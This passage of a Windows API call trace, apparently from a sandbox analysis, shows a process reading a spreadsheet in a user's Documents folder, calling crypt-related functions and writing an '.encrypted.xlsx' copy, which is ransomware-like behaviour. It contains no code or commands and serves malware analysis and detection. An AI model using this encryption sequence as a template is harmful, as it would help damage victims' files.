0 [0032.587] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0032.587] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0032.587] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.587] CryptDestroyHash (hHash=0x7c2240) returned 1 [0032.587] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.587] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.587] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0032.587] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0032.587] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.587] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3xhPX7.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3xhpx7.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0032.587] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.587] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0032.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0032.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0032.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0032.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0032.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0032.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0032.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0032.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.587] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0032.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0032.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0032.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0032.588] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0032.588] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0032.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0032.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0032.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0032.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0032.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0032.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0032.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0032.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0032.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0032.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0032.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0032.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0032.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0032.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0032.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0032.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0032.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0032.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0032.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0032.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0032.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0032.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0032.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0032.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0032.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0032.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0032.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0032.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0032.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0032.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0032.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0032.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0032.589] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0032.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0032.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0032.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0032.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0032.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0032.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0032.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0032.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0032.590] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3xhPX7.encrypted.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3xhpx7.encrypted.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0032.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0032.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0032.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0032.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0032.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0032.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0032.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0032.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.590] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0032.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0032.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0032.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0032.590] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0032.590] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0032.591] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0032.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0032.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0032.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0032.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0032.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0032.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0032.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0032.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0032.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0032.591] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0032.591] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x61b4, lpOverlapped=0x0) returned 1 [0032.593] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0032.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0032.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0032.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0032.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x61b4) returned 0x955018 [0032.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0032.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0032.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0032.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0032.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x61b4) returned 0x95b1d8 [0032.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0032.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.598] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0032.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0032.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0032.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0032.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x61b4) returned 0x955018 [0032.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0032.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0032.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0032.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.598] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0032.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0032.599] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0032.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0032.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.605] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0032.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0032.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0032.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0032.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0032.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0032.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0032.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x61b4) returned 0x955018 [0032.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0032.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0032.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0032.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0032.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da378 [0032.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0032.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0032.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3b8 [0032.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0032.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0032.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0032.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cf10 [0032.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0032.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0032.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0032.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0032.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0032.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x61b4) returned 0x961398 [0032.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0032.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0032.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0032.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0032.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0032.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0032.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0032.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0032.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0032.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0032.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0032.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0032.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0032.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0032.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0032.607] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0032.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0032.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0032.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0032.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0032.607] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0032.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0032.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0032.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0032.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0032.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0032.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0032.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0032.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0032.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0032.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0032.608] CharUpperBuffW (in: 